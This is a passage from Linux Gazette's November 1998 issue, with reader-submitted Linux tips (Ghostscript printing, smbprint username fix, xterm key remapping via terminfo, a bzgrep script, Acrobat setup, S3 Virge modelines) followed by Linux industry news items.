If you want the best of both worlds of Java and Ada, write applets targeted to the JVM in Ada! See these URLs for further info:

http://www.adahome.com/Resources/Ada_Java.html http://www.buffnet.net/~westley/AdaJava/

--
Terry J. Westley


Re: Canon BJC-250 question

Date: Fri, 2 Oct 1998 10:21:52 -0500 (CDT)
From:
You asked:
I have a Canon BJC-250 color printer. I have heard many people say that the BJC-600 printer driver will let me print in color. But I have not heard anyone say where I can get such a driver. I have looked everywhere but where it is. Can you help me?
Most printing on Linux is handled through the use of the Ghostscript drivers. Ghostscript takes postscript input directed to it via the lpr command and converts it to the raw data streams that a particular output device can handle. Ghostscript can handle devices like printers but can also be used to display postscript files to your display (via the ghostview program).

To see if you have ghostscript installed, type the following:

 
% gs -v
"gs" is the command name for the ghostscript program (yes, it's really a program that has a bunch of output drivers compiled into it). The -v option asks it to print version information. If you have gs installed you'll see something like this:
 
Aladdin Ghostscript 4.03 (1996-9-23)
Copyright (C) 1996 Aladdin Enterprises, Menlo Park, CA.  All rights
reserved.
Usage: gs [switches] [file1.ps file2.ps ...]
Most frequently used switches: (you can use # in place of =)
 -dNOPAUSE           no pause after page   | -q       `quiet', fewer messages
 -g<width>x<height>  page size in pixels   | -r<res>  pixels/inch resolution
 -sDEVICE=<devname>  select device         | -c quit  (as the last switch)
                                           |            exit after last file
 -sOutputFile=<file> select output file: - for stdout, |command for pipe,
                                         embed %d or %ld for page #
Input formats: PostScript PostScriptLevel1 PostScriptLevel2 PDF
Available devices:
   x11 x11alpha x11cmyk x11mono deskjet djet500 laserjet ljetplus ljet2p
   ljet3 ljet4 cdeskjet cdjcolor cdjmono cdj550 pj pjxl pjxl300 bj10e bj200
   bjc600 bjc800 faxg3 faxg32d faxg4 pcxmono pcxgray pcx16 pcx256 pcx24b pbm
   pbmraw pgm pgmraw pgnm pgnmraw pnm pnmraw ppm ppmraw tiffcrle tiffg3
   tiffg32d tiffg4 tifflzw tiffpack tiff12nc tiff24nc psmono bit bitrgb
   bitcmyk pngmono pnggray png16 png256 png16m pdfwrite nullpage
Search path:
   . : /usr/openwin/lib/X11/fonts/Type1 : /usr/openwin/lib/X11/fonts/Type3 :
   /opt/AEgs/share/ghostscript/4.02 : /opt/AEgs/share/ghostscript/fonts
For more information, see /opt/AEgs/share/ghostscript/4.02/doc/use.txt.
Report bugs to [email protected]; use the form in new-user.txt.
(the dashed lines are just to delimit the output from my email message)

This output comes from a version of ghostscript built for a Solaris system by someone other than myself. I don't know if this is the default set of devices you'll see on a Linux distribution or not.

The "available devices" say which devices you can use with gs. In this case the bubble jet 250 is not specifically listed (I suspect it would say bjc250, but I could be wrong), so I would (if I were using that particular printer) have to get the source and read the devices.txt file to find out if this printer is supported, either by its own driver or by one of the other drivers (perhaps the bjc600 supports it, for example).

This is the short explanation. To summarize, you'll need to familiarize yourself with Ghostscript and using lpr. If you're lucky and this printer is commonly supported by the various Linux distributions then you may already have this printer configured in the ghostscript you have installed on your box.

For information on Ghostscript you'll need to look at the Ghostscript FAQ at http://www.cs.wisc.edu/~ghost/gsfaq.html. Note that there are two versions of Ghostscript: Aladdin's and the GNU version. Aladdin's is a commercial product but it's free for personal use. If you're not planning on redistributing it then I recommend the Aladdin version.

Okay, that's all the good news. I just checked the devices list at http://www.cs.wisc.edu/~ghost/aladdin/devices.html and it doesn't list the Canon Color Bubble Jet 250. If this printer is supported it's either with a newer, unlisted driver or by one of the other drivers. You'll probably need to check the .txt files that come with the source, find the author of the Color Bubble Jet drivers and drop them a line to see if they know if this printer will work with one of the existing drivers.

Hope that helps point you in the right direction.

Michael J. Hammel, The Graphics Muse


re: problem mounting vfat filesystem

Date: Fri, 2 Oct 1998 08:20:38 -0500 (CDT)
From: Scott Carlson,

Jan,
My /etc/fstab contains this line:

 
/dev/hda4     /f:  vfat    defaults,umask=007,gid=101        1 1
This mounts my dos directory at /f: ( to match when I boot NT ) it allows root, or anyone in the group 101 to read or write the directory. I set up the 101 group so I could say only people in that group could write to /f:

To allow everyone change it to defaults,umask=000

Scott Carlson


SMB Printing for users with spaces in their SMB username

Date: Tue, 06 Oct 98 14:31:42 -0800
From:

In order to get SMB printing to work under Red Hat Linux 5.1 with my username (which has a single space in it), I made the following addition to the Red Hat print filter "smbprint", located in: /usr/lib/rhs/rhs-printfilters/smbprint

 
USER="`echo $usercmd | awk '{printf "%s %s", $2,
$3}'`"%$password
usercmd=""
(The above lines were inserted just prior to the last line in the script, which on my system was):
 
(echo "print -"; cat) | /usr/bin/smbclient "$share"
$password -E ${hostip:+-I} $hostip -N -P $usercmd
2>/dev/null
This has the effect of setting the USER variable to "User Name"%password, where User Name is the name of the user as passed in to the script in the $usercmd varible. AWK is used to strip out the leading "-U" supplied as part of $usercmd somewhere up the command chain.

This solution only works for usernames with a single space in them. A more complex and full-featured solution would deal with no spaces or multiple spaces, either way. In any case, I feel Red Hat should find a general solution to this and incorporate it in their next release.

Warren

P.S. Thanks for a great forum for sharing tips and tricks for Linux. BTW, does Red Hat read these tips? I'd appreciate it if someone would submit this bug to them for fixing. Generalized fix for SMB printing-- usernames w/spaces Date: Wed, 07 Oct 98 06:38:02 -0800
From:

I wrote you earlier about a bug in Red Hat 5.1's /usr/lib/rhs/rhs-printfilters/smbprint

I later realized a simple generalized solution, by looking at the source code in more detail. The lines I added before can be replaced with:

 
export USER="$user"%$password
usercmd=""
(Just prior to the last line which calls smbclient).

For a more full-featured fix, simply modify the setting of $usercmd to: 1. Replace references to $usercmd with references to $USER.

2. $USER should be set/exported conditionally as $usercmd is at present.

3. $usercmd should be removed entirely from usage.

The only reliable way to pass a username/password to smbclient is via the USER environment variable.

1. The environment variable will not be seen on the cmd line by someone running ps, thus not exposing your password accidentally.

2. User names/passwords passed on the command line cannot contain spaces. If you embed them in quotes, smbclient keeps the quotes instead of trimming them off, causing username/password mismatch on the server. If you leave off the quotes, normal command-line parsing separates the username/password into separate parameters, and only the first word of each will get used.

Anyone using Red Hat print-filters will want to fix this, just in case they ever decide to set up SMB printing and are stuck with spaces in their username/password (as I am).

Warren E. Downs


2 Cent Tip -- Netscape

Date: Sun, 11 Oct 1998 10:37:37 +0200 (MET DST)
From: Hans-Joachim Baader,

we all use Netscape every now and then. Most people won't use it as mailreader since it is too bloated, and the UNIX mailreaders are generally much better.

Nevertheless, Netscape seems to create a directory nsmail in the user's home directory every time it starts and doesn't find it, even if mail is not used. This is annoying. Here's a trick which doesn't make this directory go away, but at least makes it invisible.

I didn't find a GUI equivalent to change this setting so you have to do the following:

Edit the file ~/.netscape/preferences.js and change all occurences of 'nsmail' to '.netscape'. The important thing here is, of course, the leading dot before 'netscape'.

Regards,
hjb


Cobol

Date: Wed, 14 Oct 1998 23:10:35 +1000
From: "John Leach",
To: [email protected]

I saw your request for help in the Linux Gazette re Cobol. I've been using AcuCobol for 2 years under Linux and I strongly recommend the product and the company.

I don't know the cost of the compiler because my company bought it - but email them and ask for a student copy - they can only refuse... They have a full development environment called 'AcuBench' which currently only runs only under Windows.

The amazing thing about AcuCobol is that programs compiled on one platform will run totally unchanged on another machine - I tend to develop under Windows but install at clients sites on Linux. I hope this has been helpful.

Regards
John Leach


Piped Signatures

Date: Fri, 16 Oct 1998 17:03:41 +0000
From: Colin Smith,

This has probably come up before, but the "more fun with pipes" thing in issue 33 reminded me of it.

Have a different signature appear in your emails every time you send one.

Create a subdrectory in your home called .signatures and copy your .signature file into it under a visible name. delete your .signature file and create a pipe in its place using

 
mkfifo .signature
Create a script which simply "cat"s each of the files in the .signatures directory out to the .signature pipe:
 
#!/bin/sh
while true
do
        for SIGNATURE in ${HOME}/.signatures/*
        do
                # Cat each file out to the .signature and throw away any errors.

                cat ${SIGNATURE} > ${HOME}/.signature 2> /dev/null

                # This sleep seems to be required for Netscape to work properly
                # I think buffering on the filesystem can cause multiple signatures
                # to be read otherwise. I think the sleep allows Netscape to see
                # the End Of File.

                sleep 1
        done
done
Have this script kick off in the background every time you log in to the system in your profile or xsession. Add more entries to the .signatures directory and they automatically get used in your emails.

Issues and problems:
One issue might be blocking on the pipe. If there is no process feeding signature files down the pipe, any programs which open the pipe can appear to hang until something is written.

--
Colin Smith


Fixing backspace and delete Key in X-windows

Date: Sun, 18 Oct 1998 17:40:28 +1000
From: "Steven K.H. Siew",

If you have installed Red Hat version 5.0, you will have come across this problem. It will not take you long to realise that the backspace key (by this I mean the key above the ENTER key) and the delete key (by this I mean the key below the INSERT key and to the left of the END key) behaves differently on the console than on xterm in X-windows.

This is extremely irritating if like me you work in both the text-only console and xterm on X-windows. I set about to make sure that the behaviour is the same on both of them. In other words I want them to be standardise.

My solution is to make the backspace, delete and the pageup and pagedown key to behave exactly like they do in the text-only console.

The literature to do this is available on the web, however here I shall show those who have not done this yet, the steps needed to acheive this. A word of warning! This is dangerous. You can potentially stuff things up very very badly. In other words you must do this extremely carefully (and make lots of backups).

For your information I included the links below where you may obtain more details about this matter.

http://www.best.com/~aturner//RedHat-FAQ/ http://www.ibbnet.nl/~anne/keyboard.html

Okay now for the step by step instruction to fix the problem

Step one
* * * is to create a directory to store the original files

 
ksiew > mkdir original-terminfo-file
ksiew > cd original-terminfo-file/
original-terminfo-file > pwd
/home/ksiew/original-terminfo-file

Step two
* * * is to save the original copy of the xterm terminfo file

 
original-terminfo-file > locate xterm | grep terminfo | grep x/xterm
/usr/lib/terminfo/x/xterm
/usr/lib/terminfo/x/xterm-bold
/usr/lib/terminfo/x/xterm-color
/usr/lib/terminfo/x/xterm-nic
/usr/lib/terminfo/x/xterm-pcolor
/usr/lib/terminfo/x/xterm-sun
/usr/lib/terminfo/x/xterms
/usr/lib/terminfo/x/xterms-sun
original-terminfo-file > cp /usr/lib/terminfo/x/xterm xterm.original
original-terminfo-file > ls -al
total 5
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 15:35 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 15:31 ..
-rw-rw-r--   1 ksiew    ksiew        1380 Oct 18 15:35 xterm.original
Step three
* * * is to obtain the xterm terminfo settings and save it into a file called "xterm" in the current directory

original-terminfo-file > infocmp xterm > xterm
original-terminfo-file > less ./xterm
#       Reconstructed via infocmp from file: /usr/lib/terminfo/x/xterm
xterm|vs100|xterm terminal emulator (X11R6 Window System), 
        am, km, mir, msgr, xenl, xon, 
        cols#80, it#8, lines#65, 
        acsc=``aaffggjjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..--++\
054\054hhII00, 
        bel=^G, bold=\E[1m, clear=\E[H\E[2J, cr=^M, 
        csr=\E[%i%p1%d;%p2%dr, cub=\E[%p1%dD, cub1=^H, 
        cud=\E[%p1%dB, cud1=^J, cuf=\E[%p1%dC, cuf1=\E[C, 
        cup=\E[%i%p1%d;%p2%dH, cuu=\E[%p1%dA, cuu1=\E[A, 
        dch=\E[%p1%dP, dch1=\E[P, dl=\E[%p1%dM, dl1=\E[M, 
        ed=\E[J, el=\E[K, enacs=\E(B\E)0, home=\E[H, ht=^I, 
        ich=\E[%p1%d@, ich1=\E[@, il=\E[%p1%dL, il1=\E[L, 
        ind=^J, 
        is2=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;3;4;6l\E[4l, 
        kbs=^H, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kend=\EOe, kent=\EOM, 
        kf1=\E[11~, kf10=\E[21~, kf11=\E[23~, kf12=\E[24~, 
        kf2=\E[12~, kf3=\E[13~, kf4=\E[14~, kf5=\E[15~, 
        kf6=\E[17~, kf7=\E[18~, kf8=\E[19~, kf9=\E[20~, 
        khome=\EO\200, kich1=\E[2~, kmous=\E[M, knp=\E[6~, 
        kpp=\E[5~, rc=\E8, rev=\E[7m, ri=\EM, rmacs=^O, 
        rmam=\E[?7l, rmcup=\E[2J\E[?47l\E8, rmir=\E[4l, 
        rmkx=\E[?1l\E>, rmso=\E[m, rmul=\E[m, rs1=^O, 
        rs2=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;3;4;6l\E[4l\E<, 
        sc=\E7, sgr0=\E[m, smacs=^N, smam=\E[?7h, 
        smcup=\E7\E[?47h, smir=\E[4h, smkx=\E[?1h\E=, 
        smso=\E[7m, smul=\E[4m, tbc=\E[3k, u6=\E[%i%d;%dR, 
        u7=\E[6n, u8=\E[?1;2c, u9=\E[c, 
Step four
* * * is to modify the file called "xterm" in the current directory to change the kbs setting and to insert a new kdch1 setting

Change from

 
        kbs=^H, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kend=\EOe, kent=\EOM, 
to
 
        kbs=\177, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kdch1=\E[3~, kend=\EOe, kent=\EOM, 
Step five
* * * is to create a .terminfo directory, setup the TERMINFO, setup TERM as xterm, change into superuser and then recompile the "xterm" settings file
 
original-terminfo-file > mkdir ~/.terminfo

original-terminfo-file > export TERMINFO=~/.terminfo
If you are using tcsh, type instead
 
    original-terminfo-file > setenv TERMINFO ~/.terminfo

original-terminfo-file > export TERM=xterm
If you are using tcsh, type instead
 
    original-terminfo-file > setenv TERM xterm

original-terminfo-file > su
password: opensesame

#| tic xterm
Step six
* * * is to change to the ~/.terminfo/x/ directory and copy the xterm file to /usr/lib/terminfo/x/xterm
 
#| cd ~/.terminfo/x/
#| cp xterm /usr/lib/terminfo/x/xterm
#| cd ~
#| rm -rf .terminfo
#| exit
ksiew>
Step seven * * * is to logoff and log back on (this is to get rid of the TERMINFO variable) and change the .Xdefaults file
 
ksiew> logout
login: ksiew
password: opensesame
ksiew> less .Xdefaults
Output from less
Now change the last few lines from
 
xterm*VT100.Translations: #override\n\
        <KeyPress>gt;Prior : scroll-back(1,page)\n\
        <KeyPress>gt;Next : scroll-forw(1,page)
nxterm*VT100.Translations: #override\n\
        <KeyPress>gt;Prior : scroll-back(1,page)\n\
        <KeyPress>gt;Next : scroll-forw(1,page)
to the following lines
 
xterm*VT100.Translations: #override\n\
        <KeyPress>gt;Prior : string("\033[5~")\n\
        <KeyPress>gt;Next  : string("\033[6~")
nxterm*VT100.Translations: #override\n\
        <KeyPress>gt;Prior : string("\033[5~")\n\
        <KeyPress>gt;Next  : string("\033[6~")
*VT100.Translations: #override \
        <Key>gt;BackSpace: string(0x7F)\n\
        <Key>gt;Delete:    string("\033[3~")\n\
        <Key>gt;Home:      string("\033[1~")\n\
        <Key>gt;End:       string("\033[4~")
*ttyModes: erase ^?
That's it! Save the .Xdefaults file and now you can start X-windows and the backspace key, the delete key, the pageup key and the pagedown key will work just like in the text-only console window.

Steven


Creating bzgrep Program

Date: Sun, 18 Oct 1998 17:35:43 +1000
From: "Steven K.H. Siew",

If you have ever used zgrep on gzip-textfiles then you would have realise what a wonderful it is. The program zgrep allows you to grep a textfile even if the text file is compressed in gzip format. Not only that it can also grep a uncompress textfile. For example if you have the following directory

 
testing > ls -al
total 2086
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 11:07 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 11:00 ..
-rwxrwxr-x   1 ksiew    ksiew     1363115 Oct 18 11:01 cortes.txt
-rwxrwxr-x   1 ksiew    ksiew      172860 Oct 18 11:01 lost_world_10.txt.gz
-rwxrwxr-x   1 ksiew    ksiew      582867 Oct 18 11:00 moon10a.txt
Then if you are looking for the word "haste",
 
testing > zgrep -l haste *
cortes.txt
lost_world_10.txt.gz
moon10a.txt
Tells you that "haste" is in all three files.

Now if you compress a textfile using the famous bzip2 compress program, you have a problem.

 
testing > bzip2 cortes.txt 
testing > ls -al
total 1098
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 11:12 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 11:12 ..
-rwxrwxr-x   1 ksiew    ksiew      355431 Oct 18 11:01 cortes.txt.bz2
-rwxrwxr-x   1 ksiew    ksiew      172860 Oct 18 11:01 lost_world_10.txt.gz
-rwxrwxr-x   1 ksiew    ksiew      582867 Oct 18 11:00 moon10a.txt
testing > zgrep -l haste *
lost_world_10.txt.gz
moon10a.txt
What happen now is that zgrep no longer recognise the file cortes.txt.bz2 as a compress text file.

What we need is a new program bzgrep which can recognise bzip2 compress text files.

The best way to create bzgrep file is to modify the existing zgrep file.

 
testing > locate zgrep
/usr/bin/zgrep
/usr/man/man1/zgrep.1

testing > su
password: opensesame
#| cp /usr/bin/zgrep /usr/local/bin/bzgrep
The bzgrep file is a copy of zgrep file can contain this text.

We cannot change the last few lines to the following

res=0
for i do
  if test $list -eq 1; then
    bzip2 -cdf "$i" | $grep $opt "$pat" > /dev/null && echo $i
    r=$?
  elif test $# -eq 1 -o $silent -eq 1; then
    bzip2 -cdf "$i" | $grep $opt "$pat"
    r=$?
  else
    bzip2 -cdf "$i" | $grep $opt "$pat" | sed "s|^|${i}:|"
    r=$?
  fi
  test "$r" -ne 0 && res="$r"
done
exit $res

Now the bzgrep file is a program that will be able to grep bzip2 compressed textfiles. BUT there is a problem.

bzgrep program WILL NOT recognise ordinary textfiles or gzip compress textfiles. This is a major problem! It means you have to compress all your textfiles with bzip2 in order to use bzgrep program.

Luckily there is always a solution in Linux. All we have to do is alter the program to be more choosy on which decompression program to use. ie. Do it uses gzip -cdfq or bzip2 -cdf

Now change the last few lines again to resemble this

 
res=0
for i do
  case "$i" in

  *.bz2 )
      if test $list -eq 1; then
        bzip2 -cdf "$i" | $grep $opt "$pat" > /dev/null && echo $i
        r=$?
      elif test $# -eq 1 -o $silent -eq 1; then
        bzip2 -cdf "$i" | $grep $opt "$pat"
        r=$?
      else
        bzip2 -cdf "$i" | $grep $opt "$pat" | sed "s|^|${i}:|" 
        r=$?
      fi ;;

  * )
      if test $list -eq 1; then
        gzip -cdfq "$i" | $grep $opt "$pat" > /dev/null && echo $i
        r=$?
      elif test $# -eq 1 -o $silent -eq 1; then
        gzip -cdfq "$i" | $grep $opt "$pat"
        r=$?
      else
        gzip -cdfq "$i" | $grep $opt "$pat" | sed "s|^|${i}:|" 
        r=$?
      fi ;;
  esac
  test "$r" -ne 0 && res="$r" 
done
exit $res
Finally, this is the contents of a working bzgrep program.

Steve


Re: Linux on PalmPilot

Date: Sat, 17 Oct 1998 17:00:37 -0600 (MDT)
From: "Michael J. Hammel",
In a previous message, dino jose says:
Hi... Mike, I read your article about the Linux in palm pilot.Its very intersting.Iam kind of new in LINUX platform! Because Iam so curious about Linux. I bought a palm pilot 111 the new version of palm with 2meg of memory.the main problem is, I don't know where to get the Linux operating system that it runs on palm pilot 111 the newer version. what about the HOW TO LINUX DOCUMENTATION FROM from its official site? Once I get this software do I run this in Linux operating system then transfer this to palm 111? Iam kind novice in Linux. If you could help me.I would gladly appreciated. Thanks a lot....
Actually, you don't run Linux on the PalmPilot itself (although there is a project to do so - I don't know much about that however). You run Linux on your PC and transfer data files between the Linux system and the Pilot. You still run the same programs you normally would *on* the PalmPilot - it's just that you can transfer these programs and their data file to the Pilot using tools on Linux.

Don't let using Linux confuse you. You use Linux in the same way you use Microsoft Windows - it runs on your PC to do word processing or spreadsheets or whatever. You then pass data files back and forth the the Pilot using special tools.

If you want to try out a program that helps transfer files back and forth you can try my XNotesPlus. Its a sticky notes program that will allow you do backups of your Pilot to your local hard disk and will transfer the Address database from the Pilot to be used in doing some simple printing of envelopes. You can download the program from http://www.graphics-muse.org/xnotes/xnotes.html. You will also need to get the PilotLink software that I described in the article you read. XNotesPlus uses PilotLink to do the actual data transfers to and from the Pilot.

Hope this helps.

Michael J. Hammel, The Graphics Muse


Red Hat 5.1 + Acrobat Reader 3.01 HOWTO

Date: Thu, 22 Oct 1998 22:55:27 -0400
From: Louis-Philippe Brais,

Some people I know went nuts trying to install Acrobat Reader 3.01 as a helper app in Netscape, as shipped with Red Hat Linux 5.1. Here's how I've done it:

1. Download Acrobat Reader 3.01 from ftp.adobe.com. Let the installer script install the whole thing under /usr/local/Acrobat3.

2. Create the following shell script: /usr/local/Acrobat3/bin/nsacroread

 
    #!/bin/sh
    unset LD_PRELOAD
    exec /usr/local/Acrobat3/bin/acroread $* >$HOME/.nsacroread-errors
2>&1

3. Don't forget to make this script executable:

 
    # chmod 755 /usr/local/Acrobat3/bin/nsacroread
4. If the directory /usr/local/lib/netscape doesn't already exist, create it.

5. Copy (exactly) the following two files into this directory.

mailcap:

 
      #mailcap entry added by Netscape Helper
      application/pdf;/usr/local/Acrobat3/bin/nsacroread -tempFile %s
mime.types:
 
      #--Netscape Communications Corporation MIME Information
      #Do not delete the above line. It is used to identify the file
type.
      #
      #mime types added by Netscape Helper
      type=application/pdf  \
      desc="Acrobat Reader"  \
      exts="pdf" 

Note: You can do without the last two steps and instead configure the helper apps with the Edit >> Preferences menu of Netscape. This will create similar .mailcap and .mime.types files in the user's home dir. But IMHO the first method is best because this way you can configure Acrobat Reader for all users at once.

Cheers,
Louis-Philippe Brais


2 $.25 tips

Date: Thu, 22 Oct 1998 11:19:22 -0600
From: Bob van der Poel,

1. I was having some real problems with Netscape (3.04 Gold) the other day. No matter what I did, I could not get the helpers to work. Somewhere in the back of my mind, I knew that they had worked in the past, but I couldn't see anything that I'd changed. A few messages on various newsgroups turned on the lights: I had upgraded my Bash to 2.0.0--and this version has a bug in it. Expressions of the form ((..) .. ) are interpreted as arithmetic expressions, rather than nested sub-shells. Upgrading to 2.02.1(1) was almost painless and fixed the Netscape problem.

To get 2.02.1(1) go to the gnu site (www.gnu.org) and follow the links to the software sections. The new software should compile out of the box (it did for me). One problem I had was that the install script put the new binaries in /usr/local/bin, and since I had my old versions in /usr/bin they weren't found. A quick mv solved that.

2. For a number of years I've been struggling trying to read the results of color-ls on my xterm screens. A number of the colors (green and blue) were just too bright to read. I didn't want to turn down the brightness of my monitor...so I mostly just squinted. For some reason I was looking at the XTerm.ad file, and noticed that the colors could be adjusted! The XTerm.ad file should be located in /usr/lib/X11/app-defaults (or something similar). It is read each time a new xterm start up and sets various options. If you look near the end of this file you'll see a number of definitions for the VT100 colors. I changed:

        *VT100*color2: green3
to
 
        *VT100*color2: green4
and
 
        *VT100*color6: cyan3
to
 
        *VT100*color6: cyan4
Like magic, the colors are darkened and I can read the results. If you don't want to fool with your global default file, you could also just add the entries to your ~/.Xresources file.

--
Bob van der Poel


S3 Virge/DX and XFree

Date: Mon, 26 Oct 1998 00:56:25 -0500 (EST)
From: "Andy K. Jalics",

I had a S3 Virge/DX, and couldn't get it working well in XFree. This made me very mad since there is a specific XFREE_S3V (S3 virge server).

I used a borrowed Xaccel, but it made me feel guilty real quick. :) So I decided that I need to get XFree configured well, and then ditch Xaccel. I found that xfree86config can not be well used to configure a Virge.

Here are the modelines I use for a mid-range 17 inch monitor @ 16bpp using the SVGA server. *WARNING* If this blows up your monitor/card, It's not my fault, although it shouldn't.

 
   Modeline "640x480"    31.5   640  680  720  864   480  488  491  521
   ModeLine "640x480"    31.5   640  656  720  840   480  481  484  500 -HSync -VSync
   Modeline "640x400"     36     640  696  752  832   480  481  484 509 -HSync -VSync
   Modeline "800x600"     40     800  840  968 1056   600  601  605  628 +hsync +vsync
   Modeline "800x600"     50     800  856  976 1040   600  637  643  666 +hsync +vsync
   Modeline "800x600"    60.75  800  864  928 1088   600  616  621 657 -HSync -VSync
#  Modeline "1024x768"   85.00 1024 1032 1152 1360 768 784 787 823
   Modeline "1024x768"     85.00   1024 1052 1172 1320    768  780  783 803
#  Modeline "1152x864"   85.00   1152 1240 1324 1552   864  864  876  908
   Modeline "1152x864"     85.00   1152 1184 1268 1452    864  880  892 900
This cured me of using Xaccel, and should cure your S3 Virge blues. P.S. A S3 Virge can go up to 1600x1000?

Andy


Published in Linux Gazette Issue 34, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


This page maintained by the Editor of Linux Gazette,
Copyright © 1998 Specialized Systems Consultants, Inc.

"Linux Gazette...making Linux just a little more fun!"


News Bytes

Contents:


News in General


 December Linux Journal

The December issue of Linux Journal will be hitting the newsstands November 6. The focus of this issue is System Administration. We have an interview with Linus Torvalds and an article about the 2.2 kernel. We also have articles on X administration and performance monitoring tools. Check out the Table of Contents at http://www.linuxjournal.com/issue56/index.html. To subscribe to Linux Journal, go to http://www.linuxjournal.com/ljsubsorder.html.


 TIME Talks about Linux

Check out this cool article in TIME!

http://cgi.pathfinder.com/time/magazine/1998/dom/981026/technology.the_mighty_f1a.html.


 Design by Contract

Dr. Bertrand Meyer, designer of the Eiffel programming language, was in Seattle to give his one day seminar on "Design by Contract". The purpose of this workstation is teach software engineers this unique object-oriented development method which emphasizes building reliable sytems through well-defined specifications and communication between the different parties to the system.

Talking to Dr. Meyer by phone, I asked him how Eiffel was better than Java. He gave me three reasons:

When I asked him about Open Source and Linux, he replied, "Eiffel's primary library was released as open source on August 4, and other libraries will be released in the future. While Eiffel is a commercial product, we see the advantages of Open Source. We were one of the first supporters of Linux, and the Linux community is very important to us."

by


 Debian and the NetWinder

It is now possible to boot the Corel NetWinder Computer with Debian GNU/Linux, thanks to the work of Jim Pick and the other team members of the Debian Arm port. A disk image with instructions on how to use it is available from ftp://ftp.jimpick.com/pub/debian/netwinder/bootable-image/

A kernel package of the new ELF kernel (some notes are available at http://www.netwinder.org/~rahphs/knotes.html)

This alleviates the need for the chroot environment that previous development work was being conducted in, and allows work to progress even faster than before. This will also allow more people to join in the development effort easily.

Open Letter from Corel to Debian


 Corel Computer and Red Hat Software Announce Linux Operating System Partnership

Ottawa, Canada, October, 27, 1998 Corel Computer and Red Hat Software, Inc. today announced an agreement to bring the Red Hat distribution of Linux to the Corel Computer NetWinder family of thin-clients and thin-servers. Under the three-year agreement, Red Hat will port Red Hat Linux 5.1 and future releases of the software to the StrongARM processor, the underlying architecture of the NetWinder.


 SPI Web Pages Active

Date: Thu, 29 Oct 1998 10:33:43 -0500
Software in the Public Interest, Inc. is pleased to announce its new web pages. They can be found at http://www.spi-inc.org/. SPI is a non profit organization that was founded to help projects in developing software for the community. Several projects are currently being supported through monetary and hardware donations that have been made to SPI. As SPI is a non profit organization, all donations to it and the projects it supports are tax deductible.

Projects that are affiliated with and receive support from SPI are:

For more information:
SPI Press Contact,
SPI homepage: http://www.spi-inc.org/


 Amiga/LinuxInfo starts a daily news section for Amiga and Linux

The leading printed Amiga magazine in Sweden, AmigaInfo, is starting a daily news section in Swedish for Amiga and Linux news.

AmigaInfo will also start a large Linux section (about 25 pages to start with) in the upcoming issue.

http://www.xfiles.se/amigainfo/


 Oppression?

A student at UCLA, and several of the Linux users there in the dorms claim they are experiencing severe discrimination. The whole story is at http://www.nerdherd.net/oppression/. Take a look!


 Debian GNU/Linux 2.0 Hamm

The Debian GNU/Linux 2.0 'Hamm' distribution was recently recognized by Australian Personal Computer Magazine http://www.apcmag.com/. It received the 'Highly Commended Award' for being 'a very high-quality distribution, with an extensive selection of carefully prepared software packages.

More information including a review of the distribution can be found at http://apcmag.com/reviews/9809/linux.htm.


 Check Out This New Mailing List

Check out

About this mailing list:
The purpose of this mailing list is to an open forum to discuss anything related to starting, growing and maintaining Linux User Groups. Whether you are trying to get a new LUG started and need some practical advice, or have built one already and are willing to help other groups, this is the mailing list for you, whether you have 5 members or 500!

How to subscribe to this list:
Send a message to [email protected] with the following text in the message body:
subscribe lug_support YOUR_EMAIL_ADDRESS


 Free Software Award Event Kicks off "One World, One Net" Conference

Larry Wall received the First Annual Free Software Foundation Award for the Advancement of Free Software at the MIT Media Lab on Friday evening. At a reception and presentation attended by CPSR Conference registrants, computer hackers and members of the press, FSF Founder Richard Stallman presented the award, a quilted GNU (GNU's Not Unix) wall hanging.

Larry Wall won the Free Software Foundation Award for the Advancement of Free Software for his programming, most notably Perl, a robust scripting language for sophisticated text manipulation and system management. His other widely-used programs include rn (news reader), patch (development and distribution tool), metaconfig (a program that writes Configure scripts), and the Warp space-war game.


 Eureka!

On Tuesday, September 15th, 1998 in Paris, France at our user event named "Eureka", and again on October 5th at DECUS in Los Angeles, Compaq Computer Corporation announced intent to extend their support to the Linux operating system to include Intel as well as the Alpha platforms. In addition to extending this support to another architecture, Compaq is in the process of putting together a comprehensive program of Linux support.

This support includes, but is not limited to:

In continuing the concept of working with the Linux community, Compaq intends to extend its Linux support through its extensive channels partner programs. Compaq feels that this will give the broadest possible selection of products and solutions to our end customers, with our VARs, OEMs, Distributors and Resellers working with the customer to match the distribution, the layered products and third party offerings to that customer's needs.


 IBM Enhances its Websphere Application Server

IBM announced that it has extended the HTTP services in IBM WebSphere* Application Servers in the areas of performance, security and platform support by adding new functionality to the HTTP services that are packaged with WebSphere and are based on the Apache HTTP Server.

Today's announcements include technology developed by IBM Research that boosts the performance of HTTP services in the IBM WebSphere Application Server and Secure Socket Layer (SSL) support that provides customers with the security necessary to operate a web site that can handle sensitive information, such as financial transactions. In addition, IBM announced a port of the Apache HTTP Server to the AS/400* operating system. The AS/400 port will be offered to the Apache Group through the Open Source model. The Fast Response Cache Accelerator (FRCA) technology, developed by IBM Research, doubles the performance of HTTP services in WebSphere on Windows NT, according to lab tests done by SPEC (The Standard Performance Evaluation Corporation).

Both the FRCA and SSL technologies from IBM will be available at no additional charge as part of all editions of the IBM WebSphere Application Servers. The technologies will be released in the next version of WebSphere Application Server before the end of the year. The FRCA technology will also be used to boost the performance of the HTTP Server for OS/390*, and will be available as part of OS/390 Version 2 Release 7 in March of 1999.


 CommProc

A new OpenSource project, a general distributed-computing toolkit for quick assembly of distributed applications called CommProc, was presented at the October ApacheCon98 conference. CommProc is an advocacy effort for Linux and Apache and includes an interface module for the Apache HTTP server. Documentation and source code for the project is available at: http://www.commproc.com


 Launch of LinuxWorld Magazine

